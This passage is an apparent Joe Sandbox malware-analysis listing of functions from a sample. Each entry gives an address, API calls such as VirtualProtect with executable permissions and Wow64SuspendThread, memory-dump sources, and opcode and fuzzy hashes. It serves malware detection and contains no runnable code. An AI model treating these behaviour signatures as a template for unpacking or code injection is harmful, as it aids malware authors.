                                                                          • Opcode ID: 791a2a276278d87dc1d44463d3b38a027cb912813c466f0a485059ae8c97ef94
                                                                          • Instruction ID: bd07a9721d7736d58dcd13ee0b8a763fe6a210383a1536bd7392db3c91af32c0
                                                                          • Opcode Fuzzy Hash: 791a2a276278d87dc1d44463d3b38a027cb912813c466f0a485059ae8c97ef94
                                                                          • Instruction Fuzzy Hash: 81519FB2D0466CAFE720CA54DC54BEA7775EB95314F0441F9D50DAA281D2386EC18E51
                                                                          Function 00859F6F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 135threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SuspendThread.KERNEL32(?), ref: 0086DF18
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: SuspendThreadWow64
                                                                          • String ID: 9MM;
                                                                          • API String ID: 1286204186-553234120
                                                                          • Opcode ID: 9f932e6cd76c7e1c7890976678ec45ea2ac193119dc3e4048a6b87d07e80dd43
                                                                          • Instruction ID: 48b10cca18426c72b23311c272744da54faaefacd2405de5a2eb187833c8c119
                                                                          • Opcode Fuzzy Hash: 9f932e6cd76c7e1c7890976678ec45ea2ac193119dc3e4048a6b87d07e80dd43
                                                                          • Instruction Fuzzy Hash: F94126F2E042289FEB208A24DC987FBB779FB54314F1201BAD90D97640D7385EC5CA52
                                                                          Function 00845487 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 89a0ddbc88aef877e087ab69192762e85ef80c776d66da0eb22e629f9ffc099b
                                                                          • Instruction ID: b6250d39b810b7a0f61c5ef9bca20c7165f2a9b79b84f9a53835eafd8b17ee6f
                                                                          • Opcode Fuzzy Hash: 89a0ddbc88aef877e087ab69192762e85ef80c776d66da0eb22e629f9ffc099b
                                                                          • Instruction Fuzzy Hash: FF41CFB2D0466CAFE720CA14DC94BEA77B5EB95314F0441F9D50DAB281D2386E818E51
                                                                          Function 008454EF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: 6c08e0392c7b78e0a0f0ab7f079a8d9d262091e84ecb7cf2a98b8d961f74497f
                                                                          • Instruction ID: 525163bd3c684a955dee4e6fcde33b44c61a973b83edb76ddb5248d5c17a8b2f
                                                                          • Opcode Fuzzy Hash: 6c08e0392c7b78e0a0f0ab7f079a8d9d262091e84ecb7cf2a98b8d961f74497f
                                                                          • Instruction Fuzzy Hash: B1419EB2D0466CAFEB20CB54DC94BEEB7B5FB85314F0441F9D50DA7282D2386E818E12
                                                                          Function 0084575E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 120memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: c3aa079bb7d4c0cb622d5cc17458fd6ddceac02d7977776b5abe48a40f8b918b
                                                                          • Instruction ID: 6f5f6f368be4b3d6fb4b0c67ad17ae6e2ce64924f8ac825434557c8235d03d00
                                                                          • Opcode Fuzzy Hash: c3aa079bb7d4c0cb622d5cc17458fd6ddceac02d7977776b5abe48a40f8b918b
                                                                          • Instruction Fuzzy Hash: 1741B0B2D04668AFE724CB54DC94BEE7BB5FB89310F0441F9D50DAB281E2386E81CE51
                                                                          Function 00845785 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,00845ADC,?,?,00845530,?,?,?,?,?,?,00000000,?), ref: 00845B21
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886676507.0000000000845000.00000040.00000001.01000000.00000003.sdmp, Offset: 00845000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_845000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: XP
                                                                          • API String ID: 544645111-2561422682
                                                                          • Opcode ID: d4bf699d6e5a17460b0c127841c839606f797865ddc4445a2e9d46db5f1c2723
                                                                          • Instruction ID: 037edc3ad3a1e3bbbcdd2f8562b4f4aa54b560f76ee187d19b02e6980d4917c5
                                                                          • Opcode Fuzzy Hash: d4bf699d6e5a17460b0c127841c839606f797865ddc4445a2e9d46db5f1c2723
                                                                          • Instruction Fuzzy Hash: 1341B0B2D0456CAFEB20CB54DC94BEE7BB5EB99310F0441E9D40DA7242D6386E81CF51
                                                                          Function 004A4389 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: N9LF
                                                                          • API String ID: 544645111-2990983841
                                                                          • Opcode ID: 52015c76c7bcaf1f85d013123d47ccf18b3e3b7f0ddf356d6170d2330f6340af
                                                                          • Instruction ID: 455d1e96fb0c07b423b284f57063ce311c0d4ccb87cee3c997744526674d5cf7
                                                                          • Opcode Fuzzy Hash: 52015c76c7bcaf1f85d013123d47ccf18b3e3b7f0ddf356d6170d2330f6340af
                                                                          • Instruction Fuzzy Hash: A601F5F3E041446BE7208610DC80FFBA76CEBD1315F2484BAE90DD6640D17DAFC28665
                                                                          Function 00884C22 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: :;YS
                                                                          • API String ID: 544645111-267856891
                                                                          • Opcode ID: 3e20d81e49f4e1fb833db3f70bf56daf993c39c59452267590ec047143f5dbae
                                                                          • Instruction ID: 8b8c47efdc90421203a57270e7db0916d0ca28568d03e1c8cca3d58c26788955
                                                                          • Opcode Fuzzy Hash: 3e20d81e49f4e1fb833db3f70bf56daf993c39c59452267590ec047143f5dbae
                                                                          • Instruction Fuzzy Hash: CBF0E9B2A0526E4FD7209B54CCC4AF57B7AFF41348F5401EDE509D6141D2754989CB16
                                                                          Function 004BC4A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExitProcess.KERNEL32(00000000), ref: 004BC4F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-399585960
                                                                          • Opcode ID: e83f84cffd3e9fb4417bb22d6bad182a8c2840245aba02a94f1800a50c60a452
                                                                          • Instruction ID: 507a7cccd01b62f1fd72c920b159ea1c1f2cc0d797c5161bb25ddb0837b87c78
                                                                          • Opcode Fuzzy Hash: e83f84cffd3e9fb4417bb22d6bad182a8c2840245aba02a94f1800a50c60a452
                                                                          • Instruction Fuzzy Hash: ABE0EDB5A0921DCBDB34CA55DC907F8B371EB94325F1042EBD51D91680C6340E859F56
                                                                          Function 004A436D Relevance: 3.1, APIs: 2, Instructions: 84memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 51114aa891832aa18758f0fbf0199872fb32171fb5fc94f632483984e3dbf3d9
                                                                          • Instruction ID: a145c7ee21331861cf4670adda9b884081cc63bc7a3b21086c1c2183cf9356e5
                                                                          • Opcode Fuzzy Hash: 51114aa891832aa18758f0fbf0199872fb32171fb5fc94f632483984e3dbf3d9
                                                                          • Instruction Fuzzy Hash: 3B2195B2A15518AFE714CA24DC94AFFB37DEBD5310F1081AAA50EA6680C67CAFC14F15
                                                                          Function 00834928 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: 4NC9
                                                                          • API String ID: 1263568516-2690155758
                                                                          • Opcode ID: 271f2f0359f654d7be010c519dda69adc405196c6e280aa2abce32fc39a936df
                                                                          • Instruction ID: 121c744e13d5529f3eb2c2c978807ac318fdc16c2bb6e1f2ca70bad0e33a9a04
                                                                          • Opcode Fuzzy Hash: 271f2f0359f654d7be010c519dda69adc405196c6e280aa2abce32fc39a936df
                                                                          • Instruction Fuzzy Hash: 2E21F3B2E01258ABF7708A64DC48FAB7B79FBC5720F1440B9E40DA6280C6789FC18F51
                                                                          Function 008348D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00835716
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID: NOCH
                                                                          • API String ID: 1263568516-2182803339
                                                                          • Opcode ID: febecf4c4c1df91a58e62c5a5eef959462ca7b8ba408fc8ff683c91704266c8b
                                                                          • Instruction ID: 4d0cde98bde520bf017230c283b284776dc1e6b7bf8dd9b8a2ee6e989fc4cb78
                                                                          • Opcode Fuzzy Hash: febecf4c4c1df91a58e62c5a5eef959462ca7b8ba408fc8ff683c91704266c8b
                                                                          • Instruction Fuzzy Hash: E121F1A2E01658ABFB608A60DC48FAA7779FBC4724F1440F9A40DEA180C67C9AC08F11
                                                                          Function 00867B35 Relevance: 1.8, APIs: 1, Instructions: 345COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c09862034ab12f13a5adf03a6caafb108f8ba06e7d4cde7771df2d10c887d56
                                                                          • Instruction ID: 9cc3e31eb206b7518337fae29dbb3d51ad87b83d972195753a72c84fa1da5fe4
                                                                          • Opcode Fuzzy Hash: 4c09862034ab12f13a5adf03a6caafb108f8ba06e7d4cde7771df2d10c887d56
                                                                          • Instruction Fuzzy Hash: 6BD1B0B1D051688FEB24CF14DC98BEABBB5FB84318F1542EAD90DA6240D6356EC4CF81
                                                                          Function 0089A134 Relevance: 1.7, APIs: 1, Instructions: 239memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 107eaea3b6d86088b0963b4fadc1be8ebbb43da93d9d449c03a01ecca49a8707
                                                                          • Instruction ID: 0c98abf47840c33b94ae3edf9fbefce315bdd3851586fe1b7886e0be4115d44f
                                                                          • Opcode Fuzzy Hash: 107eaea3b6d86088b0963b4fadc1be8ebbb43da93d9d449c03a01ecca49a8707
                                                                          • Instruction Fuzzy Hash: 8C91E8B2D04528DEEB288B14DC84BFA7375FB85315F1881FED80EA6640E6395EC58F52
                                                                          Function 004A4754 Relevance: 1.7, APIs: 1, Instructions: 215memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004A4AF5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886280803.00000000004A4000.00000020.00000001.01000000.00000003.sdmp, Offset: 004A4000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a4000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 32c0743b1f9c5217da9b3244edb9b5e072506e848c4b3e54283ca89a375ed033
                                                                          • Instruction ID: 9d8d38d26e9920ebefd080597bfc467797b4a089e0f2b8ced313cfbe6745a529
                                                                          • Opcode Fuzzy Hash: 32c0743b1f9c5217da9b3244edb9b5e072506e848c4b3e54283ca89a375ed033
                                                                          • Instruction Fuzzy Hash: 79A127B5D091698BDB24CB14CC90BEEB7B5EBD6305F2481EAD80D67241D6786F81CF88
                                                                          Function 00899F8C Relevance: 1.7, APIs: 1, Instructions: 201memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0089A62C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: e44bf88733ed08a9ad68586f3d4023771a16757fa5231110b9b3d03d30849834
                                                                          • Instruction ID: c93ba355f7504ea388010b394bb0c598c7c6220cc3d38592b4e74115d6cb7500
                                                                          • Opcode Fuzzy Hash: e44bf88733ed08a9ad68586f3d4023771a16757fa5231110b9b3d03d30849834
                                                                          • Instruction Fuzzy Hash: 0B7105B2D04518DEEB288B14DC84BFAB775FB81315F1841FED90EA6280E6795EC18F52
                                                                          Function 0085828F Relevance: 1.7, APIs: 1, Instructions: 193memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 12444fd4a75696895cb4690c9b66fad066d9ed382cb2a83f318f332ca05a54c6
                                                                          • Instruction ID: cbcefe35e4f0ac372aca01d96b28bfb0c382e16b161b6cf47399bfae0178f548
                                                                          • Opcode Fuzzy Hash: 12444fd4a75696895cb4690c9b66fad066d9ed382cb2a83f318f332ca05a54c6
                                                                          • Instruction Fuzzy Hash: 7561C3F2D042289BEB288B14DC55AEB7774FF55314F1542FAEA0DA6240EA785FC08F52
                                                                          Function 0086761B Relevance: 1.7, APIs: 1, Instructions: 193memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 9034ddbb591a576b9b18d06545e59d8e42765c4c59f9a9049f262cd1a78737f7
                                                                          • Instruction ID: 2fccd4c6e96c30abce259f49a498f6514dc93fb82ca636409459af9d4564313c
                                                                          • Opcode Fuzzy Hash: 9034ddbb591a576b9b18d06545e59d8e42765c4c59f9a9049f262cd1a78737f7
                                                                          • Instruction Fuzzy Hash: C76114B2D185189BFB248A24DC58BEB7635FF94310F1541FAD60D97280E6794FC18B52
                                                                          Function 00884148 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7df069c22b070e4dbce3fbaba68f8b45c469873dd1456e3778673242fc6de5df
                                                                          • Instruction ID: 5fa1a3e9bdde34c1616e9002a50f7752155f6833c9fed4a4850a4fde2c5b41c7
                                                                          • Opcode Fuzzy Hash: 7df069c22b070e4dbce3fbaba68f8b45c469873dd1456e3778673242fc6de5df
                                                                          • Instruction Fuzzy Hash: 2251D0F2D00129AFF7248A14DC49BFA7679FB44314F1441BEE90DA6280E6B95FC58F92
                                                                          Function 00867EA4 Relevance: 1.7, APIs: 1, Instructions: 173memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,FFFFAC50), ref: 0086865A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: bd7c5ec803f87cc8bad7073c1149f8e6b735919cad557e51b1361a2f05cd2ce1
                                                                          • Instruction ID: 95999e3c89b100462e77da41553b97e8eaef20c202440d4a04a147192455b0ce
                                                                          • Opcode Fuzzy Hash: bd7c5ec803f87cc8bad7073c1149f8e6b735919cad557e51b1361a2f05cd2ce1
                                                                          • Instruction Fuzzy Hash: F95124F3D041589FF7288A24DC58AFB7B79EB80314F1541FAEA0D96680D6785FC48A52
                                                                          Function 00899A8A Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 789f4e9411f719f4010c87672db50a874d11701a8ce872b3a3eb2fa5eba652b3
                                                                          • Instruction ID: 655b66b66fb3469e843ff06a3b7658a6c79e08d25993d11ec81e1375dca056d5
                                                                          • Opcode Fuzzy Hash: 789f4e9411f719f4010c87672db50a874d11701a8ce872b3a3eb2fa5eba652b3
                                                                          • Instruction Fuzzy Hash: BD4170A2D041589FEB249E28CC587FB3B78FB81318F1841BED58E95541D63889C5CB53
                                                                          Function 0089A4BC Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7ba2a7fa4999bb88b7052507f9bf31335abb7ea01928c3d0f94d229b2e4d4965
                                                                          • Instruction ID: 73ac19938a00a8fefeca1e080fe06b1805db16bd3c469665e510f0587d7ba46c
                                                                          • Opcode Fuzzy Hash: 7ba2a7fa4999bb88b7052507f9bf31335abb7ea01928c3d0f94d229b2e4d4965
                                                                          • Instruction Fuzzy Hash: CA41F5B2E041699EEF298A14DC94BFF7775FF82305F1D41F9D40EA6540D2789EC08A82
                                                                          Function 00884718 Relevance: 1.6, APIs: 1, Instructions: 120memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: dfdc0cf30b1725b9cc716d5655bd0f77ffd49ef285ce22cd93555cd69a599010
                                                                          • Instruction ID: b3f4b5fe665517ab53c445c9b734ceb4b72e77dbc9d7ad8798fdd5691aefa76a
                                                                          • Opcode Fuzzy Hash: dfdc0cf30b1725b9cc716d5655bd0f77ffd49ef285ce22cd93555cd69a599010
                                                                          • Instruction Fuzzy Hash: 934136B2D041299EE7249A14CC54AFA7B79EB41304F0401FDE94D92281E7B95EC5CF52
                                                                          Function 008529D7 Relevance: 1.6, APIs: 1, Instructions: 116memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00852B12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 7b91a2ec8261426cfbf6f26c3f77236b5d31f1999c48dba740422898afeb20b2
                                                                          • Instruction ID: 03a1e2e10bd3254ca763605fb56556c8b521c7494e39ad1099763666dd766f41
                                                                          • Opcode Fuzzy Hash: 7b91a2ec8261426cfbf6f26c3f77236b5d31f1999c48dba740422898afeb20b2
                                                                          • Instruction Fuzzy Hash: 9841E671D0413C8BDB25CB14CC95AEA7BB5FB81316F1081EADD4EAB280CA385EC68F51
                                                                          Function 00884735 Relevance: 1.6, APIs: 1, Instructions: 111memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,00884656,?,?,?,?,00000000), ref: 00884C64
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: c210ab731d874dc872a41d6e0a963165080072cd7dd775ebd9e3dbb815b56102
                                                                          • Instruction ID: 951736ee9a693ef9db3f85c27f97c3821101ba9db4bdfc217f4c94a49c57cab4
                                                                          • Opcode Fuzzy Hash: c210ab731d874dc872a41d6e0a963165080072cd7dd775ebd9e3dbb815b56102
                                                                          • Instruction Fuzzy Hash: DB4122B2D042299ED7249B14CC64BFA7BB9EB41304F0400FEE54992280E3B85AC4CF52
                                                                          Function 00867800 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: f2a9992be07d1199784b7d8880cfc0a0dc84b93246656796f6eb3e28987eac87
                                                                          • Instruction ID: 72a765c590dbfe7296148481d1c5c7de63ca8bf7cbdc70716535ee1f2e2b54c9
                                                                          • Opcode Fuzzy Hash: f2a9992be07d1199784b7d8880cfc0a0dc84b93246656796f6eb3e28987eac87
                                                                          • Instruction Fuzzy Hash: E0314BB2C08414EBF7144554EC1CBFB7A68FB90318F1682BDE90E95580EA7C5BC59AD2
                                                                          Function 008999C8 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886760940.0000000000884000.00000040.00000001.01000000.00000003.sdmp, Offset: 00884000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_884000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 19710997a46b20bec6bb0b1ecf6634289ed259d61bd64c1d3194523ddf2444e0
                                                                          • Instruction ID: 8d316a8d76c45f02aa7c361d44b9e0b398d9b6b1d374aff8c7f79c42679229a8
                                                                          • Opcode Fuzzy Hash: 19710997a46b20bec6bb0b1ecf6634289ed259d61bd64c1d3194523ddf2444e0
                                                                          • Instruction Fuzzy Hash: 2131A1A2D081585FFB159A34CC547BA3B68FB52318F1D02FED54AD6481D23C8AC58753
                                                                          Function 00867A35 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
